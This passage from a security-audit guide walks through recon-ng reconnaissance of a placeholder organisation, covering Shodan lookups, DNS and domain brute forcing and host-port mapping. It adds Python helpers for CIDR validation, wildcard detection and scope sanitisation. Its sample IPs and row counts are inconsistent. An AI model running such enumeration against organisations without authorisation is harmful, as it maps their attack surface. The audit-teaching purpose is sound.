[recon-ng][websitename] > use recon/netblocks-hosts/shodan_net
[recon-ng][websitename][shodan_net] > 

An empty command line can be daunting. If you are ever unsure which commands are available in the current context, use the help command.

[recon-ng][websitename][shodan_net] > help

Commands (type [help|?] <topic>):
---------------------------------
add             Adds records to the database
back            Exits the current context
del             Deletes records from the database
exit            Exits the framework
help            Displays this menu
keys            Manages framework API keys
load            Loads selected module
pdb             Starts a Python Debugger session
query           Queries the database
record          Records commands to a resource file
resource        Executes commands from a resource file
run             Runs the module
search          Searches available modules
set             Sets module options
shell           Executes shell commands
show            Shows various framework items
spool           Spools output to a file
unset           Unsets module options
use             Loads selected module

Use the show info command to learn about the module and see what options are available.

[recon-ng][websitename][shodan_net] > show info

      Name: Shodan Network Enumerator
      Path: modules/recon/netblocks-hosts/shodan_net.py
    Author: Mike Siegel and Tim Tomes (@LaNMaSteR53)

Description:
  Harvests hosts from the Shodanhq.com API by using the 'net' search operator. Updates the 'hosts'
  table with the results.

Options:
  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  LIMIT   1              yes       limit number of api requests per input source (0 = unlimited)
  SOURCE  default        yes       source of input (see 'show info' for details)

Source Options:
  default        SELECT DISTINCT netblock FROM netblocks WHERE netblock IS NOT NULL ORDER BY netblock
  <string>       string representing a single input
  <path>         path to a file containing a list of inputs
  query <sql>    database query returning one column of inputs

[recon-ng][websitename][shodan_net] > 

It pulls directly from the netblocks table that we populated. Now use run to run the module.

[recon-ng][websitename] > use recon/netblocks-hosts/shodan_net
[recon-ng][websitename][shodan_net] > run

--------------
174.154.167.69
--------------
[*] Searching Shodan API for: net:174.154.167.69
[*] 174.154.167.69 (vps.websitename.org) - 7706
[*] 174.154.167.69 (vps.websitename.org) - 110
[*] 174.154.167.69 (vps.websitename.org) - 57
[*] 174.154.167.69 (vps.websitename.org) - 22
[*] 174.154.167.69 (vps.websitename.org) - 147
[*] 174.154.167.69 (vps.websitename.org) - 997
[*] 174.154.167.69 (vps.websitename.org) - 70
[*] 174.154.167.69 (vps.websitename.org) - 25

--------------
96.127.170.121
--------------
[*] Searching Shodan API for: net:96.127.170.121
[*] 96.127.170.121 (vps.websitename.org) - 7706
[*] 96.127.170.121 (vps.websitename.org) - 22
[*] 96.127.170.121 (vps.websitename.org) - 465
[*] 96.127.170.121 (vps.websitename.org) - 997
[*] 96.127.170.121 (vps.websitename.org) - 25
[*] 96.127.170.121 (vps.websitename.org) - 995
[*] 96.127.170.121 (vps.websitename.org) - 57
[*] 96.127.170.121 (vps.websitename.org) - 147
[*] 96.127.170.121 (vps.websitename.org) - 110
[*] 96.127.170.121 (vps.leillc.net) - 7070

-------
SUMMARY
-------
[*] 17 total (2 new) items found.

Since the module promised hosts, let's see which hosts it uncovered.

[recon-ng][websitename][shodan_net] > show hosts

  +---------------------------------------------------------------------------------------------------+
  | rowid |        host       |   ip_address   | region | country | latitude | longitude |   module   |
  +---------------------------------------------------------------------------------------------------+
  | 1     | vps.websitename.org | 174.154.167.69 |      |         |          |           | shodan_net |
  | 2     | vps.websitename.org | 96.127.170.121 |      |         |          |           | shodan_net |
  | 3     | vps.leillc.net    | 96.127.170.121 |        |         |          |           | shodan_net |
  +---------------------------------------------------------------------------------------------------+

[*] 3 rows returned

The host vps.leillc.net is obviously not associated with the organization we are doing recon on; it merely shares the IP address. Since this module has finished, leave it with the back command.

[recon-ng][websitename][shodan_net] > back
[recon-ng][websitename] > 

Now we will look at the other two netblocks- modules: we will show one more and then skip the last.

First we find all the possible modules using tab completion.

[recon-ng][websitename] > use recon/netblocks-
recon/netblocks-hosts/reverse_resolve  recon/netblocks-hosts/shodan_net       recon/netblocks-ports/census_2012
[recon-ng][websitename] > use recon/netblocks-

We are going to use reverse_resolve.

[recon-ng][websitename][census_2012] > use recon/netblocks-hosts/reverse_resolve

But, when we run it we get an error!

[recon-ng][websitename][reverse_resolve] > run

--------------
174.154.167.69
--------------
[!] Need more than 1 value to unpack.

OPTIONAL: To see what went wrong, go back, set DEBUG True and run again to see the underlying Python error. It is an unpacking failure, which is what happens when the module tries to split "address/prefix" and finds no "/": netblocks must be given in CIDR notation (a single host is a.b.c.d/32; IPv4 prefix lengths run from /0 to /32). We will add the netblocks in the correct format and then delete the old ones.

First, add them in CIDR form.

[recon-ng][websitename][reverse_resolve] > add netblocks
netblock (TEXT): 177.154.167.69/32
[recon-ng][websitename][reverse_resolve] > add netblocks
netblock (TEXT): 96.127.170.121/32

Now the same addresses are in the table twice:

[recon-ng][websitename][reverse_resolve] > show netblocks

  +---------------------------------------------+
  | rowid |      netblock     |      module     |
  +---------------------------------------------+
  | 2     | 174.154.167.69    | base            |
  | 4     | 177.154.167.69/32 | reverse_resolve |
  | 3     | 96.127.170.121    | base            |
  | 5     | 96.127.170.121/32 | reverse_resolve |
  +---------------------------------------------+

[*] 4 rows returned

Now that we know their rowid numbers, we can delete the old entries.

[recon-ng][websitename][reverse_resolve] > del netblocks
rowid(s) (INT): 2
[recon-ng][websitename][reverse_resolve] > del netblocks
rowid(s) (INT): 3

And, re-running the module now works.

[recon-ng][websitename][reverse_resolve] > run

-----------------
177.154.167.69/32
-----------------
[*] 177.154.167.69 => dsl-177-154-167-69-dyn.prod-infinitum.com.mx

-----------------
96.127.170.121/32
-----------------
[*] 96.127.170.121 => vps.websitename.org

-------
SUMMARY
-------
[*] 2 total (1 new) items found.
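As an added illustration (not recon-ng's own code), here is the validation a netblock input should get before a module consumes it. It reproduces the unpack failure above for a bare address, rejects an impossible prefix, refuses to expand a block large enough to be a mistake, and expands a valid CIDR netblock to its host addresses with Python's ipaddress module. The 4096-address limit and the documentation-range addresses are assumptions for the example.

```python
# Added example, not recon-ng's own code: validating netblocks before a
# module consumes them. A bare address such as 174.154.167.69 makes any
# "address/prefix" split fail with the unpack error seen above; an invalid
# prefix such as /72 is a different mistake that should also be caught.
# The address limit and the 192.0.2.0/24 documentation range are assumptions.
import ipaddress

MAX_HOSTS = 4096   # refuse to expand huge blocks by accident (assumed limit)

def naive_split(netblock):
    """What a module doing `ip, bits = netblock.split('/')` sees.

    For a bare IP this raises ValueError ("need more than 1 value to unpack"
    on Python 2, "not enough values to unpack" on Python 3).
    """
    ip, bits = netblock.split("/")
    return ip, int(bits)

def check_netblock(netblock, max_hosts=MAX_HOSTS):
    """Classify a netblock string: 'ok', 'missing prefix', 'invalid' or 'too large'."""
    if "/" not in netblock:
        return "missing prefix"          # a single host is written a.b.c.d/32
    try:
        net = ipaddress.ip_network(netblock, strict=False)
    except ValueError:
        return "invalid"                 # bad address, or prefix outside /0../32 (IPv4)
    if net.num_addresses > max_hosts:
        return "too large"
    return "ok"

def expand_netblock(netblock, max_hosts=MAX_HOSTS):
    """Host addresses covered by a valid CIDR netblock, as strings."""
    verdict = check_netblock(netblock, max_hosts)
    if verdict != "ok":
        raise ValueError(f"{netblock}: {verdict}")
    net = ipaddress.ip_network(netblock, strict=False)
    hosts = [str(addr) for addr in net.hosts()]
    return hosts or [str(net.network_address)]   # /32: the single host itself

if __name__ == "__main__":
    for candidate in ["174.154.167.69", "174.154.167.69/32", "177.154.167.69/72",
                      "10.0.0.0/8", "192.0.2.0/30"]:
        print(f"{candidate:20s} {check_netblock(candidate)}")
    print(expand_netblock("192.0.2.0/30"))
```

Feed only "ok" netblocks to a module; with the check in place the reverse_resolve run above could not have failed on a bare address, and a typo like /72 is caught before it reaches the database.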

Exploring these hosts, we quickly realize that most of the new hosts on other domains are not associated with the organization, so we remove them.

[recon-ng][websitename] > show hosts

  +-----------------------------------------------------------------------------------------------------------------------------------+
  | rowid |                     host                     |   ip_address   | region | country | latitude | longitude |      module     |
  +-----------------------------------------------------------------------------------------------------------------------------------+
  | 4     | dsl-177-154-167-69-dyn.prod-infinitum.com.mx | 177.154.167.69 |        |         |          |           | reverse_resolve |
  | 1     | vps.websitename.org                          | 174.154.167.69 |        |         |          |           | shodan_net      |
  | 2     | vps.websitename.org                          | 96.127.170.121 |        |         |          |           | shodan_net      |
  | 7     | vps.pineapplebob.net                         | 96.127.170.121 |        |         |          |           | shodan_net      |
  +-----------------------------------------------------------------------------------------------------------------------------------+

[*] 4 rows returned
[recon-ng][websitename] > del hosts
rowid(s) (INT): 4
[recon-ng][websitename] > del hosts
rowid(s) (INT): 7

We skip the last module recon/netblocks-ports/census_2012 since you already get the idea.

Sadly, none of the new hosts were actually useful.

Let's find new domains using brute forcing. First we should look for what is available.

[recon-ng][websitename] > search domains-domains
[*] Searching for 'domains-domains'...

  Recon
  -----
    recon/domains-domains/brute_suffix
[recon-ng][websitename] > use recon/domains-domains/brute_suffix
[recon-ng][websitename][brute_suffix] > run

-------------
WEBSITENAME.ORG
-------------
[*] websitename.ac => No record found.
[*] websitename.academy => No record found.
[*] websitename.ad => No record found.
[*] websitename.ae => No record found.
[*] websitename.aero => No record found.
[*] websitename.af => (SOA) websitename.af - Host found!
[*] websitename.ag => No record found.
[*] websitename.ai => No record found.
[*] websitename.al => No record found.
[*] websitename.am => (SOA) websitename.am - Host found!
[*] websitename.an => No record found.
[*] websitename.ao => No record found.
[*] websitename.aq => (SOA) websitename.aq - Host found!
[*] websitename.ar => No record found.
[*] websitename.arpa => No record found.
[*] websitename.as => No record found.
[*] websitename.asia => No record found.
[*] websitename.at => No record found.
[*] websitename.au => No record found.
[*] websitename.aw => (SOA) websitename.aw - Host found!
[*] websitename.ax => No record found.
[*] websitename.az => No record found.
[*] websitename.ba => No record found.
[*] websitename.bb => No record found.
[*] websitename.bd => No record found.
[*] websitename.be => No record found.
[*] websitename.berlin =>  (SOA) websitename.berlin - Host found!
...
...

This returned quite a few domains; the middle section has been removed.

[recon-ng][websitename][brute_suffix] > show domains

  +------------------------------------------+
  | rowid |       domain      |    module    |
  +------------------------------------------+
  | 2     | websitename.af      | brute_suffix |
  | 7     | websitename.am      | brute_suffix |
  | 4     | websitename.asia    | brute_suffix |
  | 5     | websitename.aq      | brute_suffix |
  | 7     | websitename.bg      | brute_suffix |
             ....
             ....
             ....
  | 25    | websitename.net     | brute_suffix |
  | 1     | websitename.org     | base         |
  | 17    | websitename.uz      | brute_suffix |
  +------------------------------------------+

Many out-of-scope domains had to be removed; luckily you can specify a range of rowids (low to high) when you delete.

[recon-ng][websitename][brute_suffix] > del domains
rowid(s) (INT): 44-72

There are many domains-hosts modules and they all work the same way, so we will run just two of them: a search-engine scraper and the DNS brute forcer.

[recon-ng][websitename][brute_suffix] > use recon/domains-hosts/baidu_site
[recon-ng][websitename][baidu_site] > run

------------
WEBSITENAME.EU
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%3Awebsitename.eu
[*] www.websitename.eu
[*] Sleeping to avoid lockout...

------------
WEBSITENAME.FR
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%3Awebsitename.fr

-------------
WEBSITENAME.ORG
-------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%3Awebsitename.org
[*] www.websitename.org
[*] things.websitename.org
[*] Sleeping to avoid lockout...

----------------
WEBSITENAME.ORG.UK
----------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%3Awebsitename.org.uk

------------
WEBSITENAME.COM
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%3Awebsitename.com
[*] www.websitename.com
[*] Sleeping to avoid lockout...

-------
SUMMARY
-------
[*] 5 total (2 new) items found.
[recon-ng][websitename][baidu_site] > use recon/domains-hosts/brute_hosts
[recon-ng][websitename][brute_hosts] > run

-------------
WEBSITENAME.ORG
-------------
[*] No Wildcard DNS entry found.
[*] 0.websitename.org => No record found.
[*] 01.websitename.org => No record found.
[*] 02.websitename.org => No record found.
[*] 03.websitename.org => No record found.
[*] 1.websitename.org => No record found.
[*] 10.websitename.org => No record found.
[*] 11.websitename.org => No record found.
[*] 12.websitename.org => No record found.
[*] 13.websitename.org => No record found.
[*] 14.websitename.org => No record found.
[*] 15.websitename.org => No record found.
[*] 16.websitename.org => No record found.
[*] 17.websitename.org => No record found.
[*] 18.websitename.org => No record found.
[*] 19.websitename.org => No record found.
[*] 2.websitename.org => No record found.
[*] 20.websitename.org => No record found.
[*] 3.websitename.org => No record found.
[*] 3com.websitename.org => No record found.
[*] 4.websitename.org => No record found.
[*] 5.websitename.org => No record found.
[*] 6.websitename.org => No record found.
...
...
[*] autodiscover.websitename.org => (CNAME) autodiscover.websitename-mail.org - Host found!
[*] autodiscover.websitename.org => (A) autodiscover.websitename.org - Host found!
[*] autorun.websitename.org => No record found.
[*] av.websitename.org => No record found.
...
...
[recon-ng][websitename] > show hosts

  +------------------------------------------------------------------------------------------------------------------+
  | rowid |               host              |   ip_address   | region | country | latitude | longitude |    module   |
  +------------------------------------------------------------------------------------------------------------------+
  | 8     | autodiscover.websitename-mail.org |                |        |         |          |           | brute_hosts |
  | 9     | autodiscover.websitename.org      |                |        |         |          |           | brute_hosts |
  | 32    | autodiscover.websitename.com       |                |        |         |          |           | brute_hosts |
  | 10    | conference.websitename.org        |                |        |         |          |           | brute_hosts |
  | 12    | beta.websitename.org              |                |        |         |          |           | brute_hosts |
  | 5     | demo.websitename.org            |                |        |         |          |           | baidu_site  |
  | 14    | email.websitename.org             |                |        |         |          |           | brute_hosts |
  | 15    | intranet.websitename.org               |                |        |         |          |           | brute_hosts |
  | 16    | ftp.websitename.org               |                |        |         |          |           | brute_hosts |
  | 37    | ftp.websitename.com                |                |        |         |          |           | brute_hosts |
  | 13    | ftp2.websitename.org              |                |        |         |          |           | brute_hosts |
  | 11    | websitename.github.com            |                |        |         |          |           | brute_hosts |
  | 24    | websitename.org                   |                |        |         |          |           | brute_hosts |
  | 75    | websitename.com                    |                |        |         |          |           | brute_hosts |
  | 18    | localhost.websitename.org         |                |        |         |          |           | brute_hosts |
  | 19    | mail.websitename.org              |                |        |         |          |           | brute_hosts |
  | 36    | mail.websitename.com               |                |        |         |          |           | brute_hosts |
  | 20    | ns1.websitename.org               |                |        |         |          |           | brute_hosts |
  | 27    | temp.websitename.org              |                |        |         |          |           | brute_hosts |
  | 25    | test.websitename.org              |                |        |         |          |           | brute_hosts |
  | 1     | vps.websitename.org               | 174.174.177.77 |        |         |          |           | shodan_net  |
  | 2     | vps.websitename.org               | 77.127.170.121 |        |         |          |           | shodan_net  |
  | 27    | webmail.websitename.com            |                |        |         |          |           | brute_hosts |
  | 4     | www.websitename.org               |                |        |         |          |           | baidu_site  |
  | 7     | www.websitename.com                |                |        |         |          |           | baidu_site  |
  +------------------------------------------------------------------------------------------------------------------+

[*] 77 rows returned

NOTE: Many host-gathering modules use the hosts already in the database as their starting point. It is important to sanitize the hosts table between modules so that you do not start enumerating from incorrectly added hosts: an out-of-scope host such as vps.leillc.net above would otherwise be fed into modules that resolve, search or scan it, wasting effort and touching systems you have no authorization to test.
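Two checks make that note concrete. As an added example (not recon-ng's brute_hosts module), the code below first probes a random label under the domain, because if that resolves the zone has a wildcard record and every guess would look like a hit (the "No Wildcard DNS entry found" line above is this check passing); it then splits a hosts list into in-scope and out-of-scope entries by domain, which is the sanitation the note asks for. The resolver is injected so the example runs offline; SAMPLE_ZONE and the wordlist are constructed data using documentation addresses, and system_resolver is provided for live use.

```python
# Added example, not recon-ng's brute_hosts module: the two checks that make
# hostname brute forcing trustworthy. First, wildcard detection: if a random
# label under the domain resolves, every guess will "resolve" and the run is
# noise. Second, scope sanitation before the next module reads the hosts table.
# The resolver is injected so the code runs offline; SAMPLE_ZONE is constructed
# data using documentation addresses (203.0.113.0/24), not real DNS answers.
import secrets
import socket

def brute_hosts(domain, wordlist, resolve):
    """resolve(name) -> list of addresses, [] when the name does not exist."""
    probe = f"{secrets.token_hex(8)}.{domain}"     # label that should never exist
    if resolve(probe):
        return {"wildcard": True, "found": {}}      # results would be meaningless
    found = {}
    for word in wordlist:
        name = f"{word}.{domain}"
        addrs = resolve(name)
        if addrs:
            found[name] = addrs
    return {"wildcard": False, "found": found}

def in_scope(host, domains):
    """True if host is one of the domains or a subdomain of one (label boundary, not a bare suffix match)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in (x.lower() for x in domains))

def sanitize(hosts, domains):
    """Split a hosts list into (keep, drop) by scope."""
    keep = [h for h in hosts if in_scope(h, domains)]
    drop = [h for h in hosts if not in_scope(h, domains)]
    return keep, drop

def system_resolver(name):
    """Real resolver for live use (needs network access)."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except OSError:
        return []

# Constructed sample zone standing in for real DNS answers.
SAMPLE_ZONE = {
    "www.websitename.org": ["203.0.113.10"],
    "mail.websitename.org": ["203.0.113.25"],
}

def sample_resolver(name):
    return SAMPLE_ZONE.get(name, [])

def wildcard_resolver(name):
    """Every name under the domain answers: what a wildcard record looks like."""
    return ["203.0.113.99"] if name.endswith(".websitename.org") else []

if __name__ == "__main__":
    words = ["www", "mail", "ftp", "intranet"]          # constructed wordlist
    print(brute_hosts("websitename.org", words, sample_resolver))
    print(brute_hosts("websitename.org", words, wildcard_resolver))
    print(sanitize(["vps.websitename.org", "vps.leillc.net"], ["websitename.org"]))
```

Note that in_scope matches on label boundaries, so evilwebsitename.org is not accepted for websitename.org; a plain suffix check would let such hosts into the table.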

The prompt below shows that the third netblocks module, recon/netblocks-ports/census_2012, was also run to fill the ports table. Joining hosts to ports on ip_address lists the ports seen on the address behind each hostname:

[recon-ng][websitename][census_2012] > query select hosts.ip_address, hosts.host, ports.host, ports.port from hosts join ports using (ip_address)

  +----------------+------------------------+---------------------+------+
  |   ip_address   |       hosts.host       |     ports.host      | port |
  +----------------+------------------------+---------------------+------+
  | 174.174.177.77 | vps.websitename.org    | vps.websitename.org | 110  |
  | 174.174.177.77 | vps.websitename.org    | vps.websitename.org | 147  |
  | 174.174.177.77 | vps.websitename.org    | vps.websitename.org | 22   |
  | 174.174.177.77 | vps.websitename.org    | vps.websitename.org | 27   |
  | 174.174.177.77 | vps.websitename.org    | vps.websitename.org | 7707 |
  | 174.174.177.77 | vps.websitename.org    | vps.websitename.org | 77   |
  | 174.174.177.77 | vps.websitename.org    | vps.websitename.org | 70   |
  | 174.174.177.77 | vps.websitename.org    | vps.websitename.org | 777  |
  | 77.127.170.121 | vps.websitename.org    | vps.websitename.org | 110  |
  | 77.127.170.121 | vps.websitename.org    | vps.websitename.org | 147  |
  | 77.127.170.121 | vps.websitename.org    | vps.websitename.org | 22   |
  | 77.127.170.121 | vps.websitename.org    | vps.websitename.org | 27   |
  | 77.127.170.121 | vps.websitename.org    | vps.websitename.org | 7707 |
  | 77.127.170.121 | vps.websitename.org    | vps.websitename.org | 477  |
  | 77.127.170.121 | vps.websitename.org    | vps.websitename.org | 77   |
  | 77.127.170.121 | vps.websitename.org    | vps.websitename.org | 777  |
  | 77.127.170.121 | vps.websitename.org    | vps.websitename.org | 777  |
  | 174.174.177.77 | www.websitename.org    | vps.websitename.org | 110  |
  | 174.174.177.77 | www.websitename.org    | vps.websitename.org | 147  |
  | 174.174.177.77 | www.websitename.org    | vps.websitename.org | 22   |
  | 174.174.177.77 | www.websitename.org    | vps.websitename.org | 27   |
  | 174.174.177.77 | www.websitename.org    | vps.websitename.org | 7707 |
  | 174.174.177.77 | www.websitename.org    | vps.websitename.org | 77   |
  | 174.174.177.77 | www.websitename.org    | vps.websitename.org | 70   |
  | 174.174.177.77 | www.websitename.org    | vps.websitename.org | 777  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 110  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 147  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 22   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 27   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 7707 |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 477  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 77   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 777  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 777  |
  | 174.174.177.77 | websitename.org        | vps.websitename.org | 110  |
  | 174.174.177.77 | websitename.org        | vps.websitename.org | 147  |
  | 174.174.177.77 | websitename.org        | vps.websitename.org | 22   |
  | 174.174.177.77 | websitename.org        | vps.websitename.org | 27   |
  | 174.174.177.77 | websitename.org        | vps.websitename.org | 7707 |
  | 174.174.177.77 | websitename.org        | vps.websitename.org | 77   |
  | 174.174.177.77 | websitename.org        | vps.websitename.org | 70   |
  | 174.174.177.77 | websitename.org        | vps.websitename.org | 777  |
  | 174.174.177.77 | test.websitename.org   | vps.websitename.org | 110  |
  | 174.174.177.77 | test.websitename.org   | vps.websitename.org | 147  |
  | 174.174.177.77 | test.websitename.org   | vps.websitename.org | 22   |
  | 174.174.177.77 | test.websitename.org   | vps.websitename.org | 27   |
  | 174.174.177.77 | test.websitename.org   | vps.websitename.org | 7707 |
  | 174.174.177.77 | test.websitename.org   | vps.websitename.org | 77   |
  | 174.174.177.77 | test.websitename.org   | vps.websitename.org | 70   |
  | 174.174.177.77 | test.websitename.org   | vps.websitename.org | 777  |
  +----------------+------------------------+---------------------+------+
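The following is an added example, not part of the SAFETAG guide or of recon-ng itself. It reproduces the hosts/ports schema implied by the query above (hosts.ip_address, hosts.host, ports.ip_address, ports.host, ports.port) in an in-memory SQLite database filled with constructed rows, removes hosts that fall outside an assumed agreed scope, and then runs the same join the guide shows. The scope lists, the extra hostnames (cdn.sharedhost.example, old.websitename.org) and the 203.0.113.9 address are all assumptions made for the example. The same DELETE statements can be issued at the recon-ng prompt with the query command used above, since that command passes SQL straight to the workspace database.

```python
"""Sanitize a recon-ng style hosts table before chaining further modules.

Added example for the SAFETAG recon-ng section; not the guide's or recon-ng's
own code. Scope values and sample rows are constructed for illustration.
"""
import ipaddress
import sqlite3

# Constructed sample data: rows a couple of hostname and port modules might
# have added. cdn.sharedhost.example was pulled in because it shares an IP
# with the organization's VPS, and old.websitename.org resolves to an address
# the organization does not own. Neither belongs in the audit.
SAMPLE_HOSTS = [
    ("vps.websitename.org", "174.174.177.77"),
    ("www.websitename.org", "174.174.177.77"),
    ("test.websitename.org", "174.174.177.77"),
    ("things.websitename.org", "77.127.170.121"),
    ("cdn.sharedhost.example", "77.127.170.121"),  # out-of-scope name, in-scope IP
    ("old.websitename.org", "203.0.113.9"),        # in-scope name, out-of-scope IP
]
SAMPLE_PORTS = [
    ("174.174.177.77", "vps.websitename.org", 22),
    ("174.174.177.77", "vps.websitename.org", 110),
    ("77.127.170.121", "vps.websitename.org", 22),
    ("203.0.113.9", "old.websitename.org", 443),
]

# Assumed scope agreed with the organization in the permission-to-test document.
SCOPE_DOMAINS = ("websitename.org",)
SCOPE_NETWORKS = ("174.174.177.77/32", "77.127.170.121/32")


def build_db(hosts=SAMPLE_HOSTS, ports=SAMPLE_PORTS):
    """Create an in-memory DB with the two tables the guide's query relies on."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table hosts (host text, ip_address text)")
    conn.execute("create table ports (ip_address text, host text, port integer)")
    conn.executemany("insert into hosts values (?, ?)", hosts)
    conn.executemany("insert into ports values (?, ?, ?)", ports)
    conn.commit()
    return conn


def in_scope(host, ip, domains=SCOPE_DOMAINS, networks=SCOPE_NETWORKS):
    """A host is in scope only if its name sits under an agreed domain AND its
    address lies inside an agreed network. Failing either test drops it."""
    name_ok = any(host == d or host.endswith("." + d) for d in domains)
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:  # garbage in the ip_address column is never in scope
        return False
    addr_ok = any(addr in ipaddress.ip_network(n) for n in networks)
    return name_ok and addr_ok


def sanitize_hosts(conn):
    """Delete out-of-scope hosts and the port records that only they justified.
    Returns the removed (host, ip_address) pairs so they can be logged."""
    rows = conn.execute("select host, ip_address from hosts").fetchall()
    removed = [(h, ip) for h, ip in rows if not in_scope(h, ip)]
    conn.executemany("delete from hosts where host = ? and ip_address = ?", removed)
    conn.execute(
        "delete from ports where ip_address not in (select ip_address from hosts)"
    )
    conn.commit()
    return removed


def hosts_with_ports(conn):
    """The join from the guide: every hostname sharing an IP inherits the ports
    found against that IP, which is why one bad host pollutes the whole view."""
    return conn.execute(
        "select hosts.ip_address, hosts.host, ports.host, ports.port "
        "from hosts join ports using (ip_address) "
        "order by hosts.ip_address, hosts.host, ports.port"
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("joined rows before sanitizing:", len(hosts_with_ports(db)))
    for host, ip in sanitize_hosts(db):
        print("removed out-of-scope host:", host, ip)
    for row in hosts_with_ports(db):
        print(row)
```

Run it between modules rather than once at the end: a host removed after the next module has already used it as a seed leaves behind the rows that module added, and those have to be hunted down separately.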
Reconnaissance: Next Steps
Reporting
[recon-ng][websitename] > use reporting/csv
[recon-ng][websitename][csv] >
[recon-ng][websitename][csv] > set TABLE Domains
TABLE => Domains
[recon-ng][websitename][csv] > set FILENAME /home/computer/.recon-ng/workspaces/websitename/Domains.csv
FILENAME => /home/computer/.recon-ng/workspaces/websitename/Domains.csv
[recon-ng][websitename][csv] > run
[*] 5 records added to '/home/computer/.recon-ng/workspaces/websitename/Domains.csv'.

Creating API Keys

APPENDIX: Device Assessment Checklist

Device Assessment Checklist

OSX
Windows

If Windows is not your primary OS, you can download sample Virtual Machines (with time limitations) from Microsoft through their project to improve IE support via https://www.modern.ie/en-us/virtualization-tools#downloads (see also http://www.makeuseof.com/tag/download-windows-xp-for-free-and-legally-straight-from-microsoft-si/ and https://modernievirt.blob.core.windows.net/vhd/virtualmachine_instructions_2014-01-21.pdf)

Windows 8

Installed updates

GUI: Control Panel -- Programs and Features -- View installed updates. For listing installed updates from the command line, see http://www.techsupportalert.com/en/quick-and-easy-way-list-all-windows-updates-installed-your-system.htm

Windows 7

In Windows 7, (GUI) Control Panel -- All Control Panel Items -- Action Center (Security tab) provides a quick run-down of most security features installed and their update status. It does not show drive encryption or specific versions.

Windows XP

Linux

APPENDIX: Remote Facilitation

Remote Facilitation

Summary

This component suggests approaches to use if in-person facilitation is not possible, and to include participation from remote staff or offices when an organization has multiple locations. This supplements the Data Assessment, Process Mapping, and Threat Assessment exercises, enabling them to be conducted remotely.

This may not produce results as deep as in-person facilitation, but it should provide an adequate level of expansion and verification of the information needed, and in most cases still delivers the secondary benefit of helping the organization build a shared understanding of its processes, risks, and risk tolerances.

Overview

There are four different approaches you can use, depending on what resources are available, the size and structure of the organization, and which activities you are trying to facilitate remotely. Is there someone that can help as an on-site facilitator? Are video conferences realistic (given bandwidth and cost)? How does the approach you use interact with existing organizational team structures?

Materials Needed
Considerations
Walkthrough

Selecting the most suitable approach requires an understanding of the capacity and personnel structure of the organization, including its ability to support communication technologies, and the availability of someone who can assist in facilitation.

After selecting the most suitable approach, the auditor should make sure to prepare for remote facilitation:

Approach 1, on-site facilitator, with video chat auditor

Suitable when there is a person who can take the facilitation role on-site. The facilitator does not have to be technical, but should be able to manage the session, making sure it is as inclusive and productive as possible. This accommodates more participants per session than Approach 3. If the auditor is able to join remotely, this is the closest substitute for in-person facilitation.

Approach 2, hybrid online/synchronous

Can be used with a large group of participants, where it is possible to meet over multiple sessions with enough time to collect and analyse responses in between.

Approach 3, multiple small sessions

Suitable for medium to large groups where it is possible to conduct multiple small video chats. It is recommended for sessions to be arranged to include people from the same organizational level, but different functions/teams/arms/departments of the organization. This approach scales to larger organizations and helps ensure voices at different levels of the organization are heard.

Approach 4, hybrid offline/asynchronous

Sample Questions: Data Mapping

Footnotes


  1. Event Planning Inputs - Level-Up

  2. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  3. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  4. "In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. If this is required, it should be part of the document."

  5. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment. Section 7.1 Coordination

  6. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  7. See the auditor trainee resource list

  8. APPENDIX A - Auditor travel kit checklist

  9. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment (travel preparation)

  10. Auditor Tool Resource List - Password Dictionary Creation

  11. APPENDIX A - Auditor travel kit checklist

  12. "Traveling teams should maintain a flyaway kit that includes systems, images, additional tools, cables, projectors, and other equipment that a team may need when performing testing at other locations."

  13. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  14. "In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. If this is required, it should be part of the document."

  15. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  16. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  17. "In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. If this is required, it should be part of the document."

  18. Determining Audit Location - The Penetration Testing Execution Standard: Pre-Engagement Guidelines

  19. "When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests."

  20. Usually when working with an external funder, an engagement report, free of sensitive data about the host organization, will be created for submission to the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

  21. Determining Audit Location - The Penetration Testing Execution Standard: Pre-Engagement Guidelines

  22. "Before starting a penetration test, all targets must be identified. "

  23. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

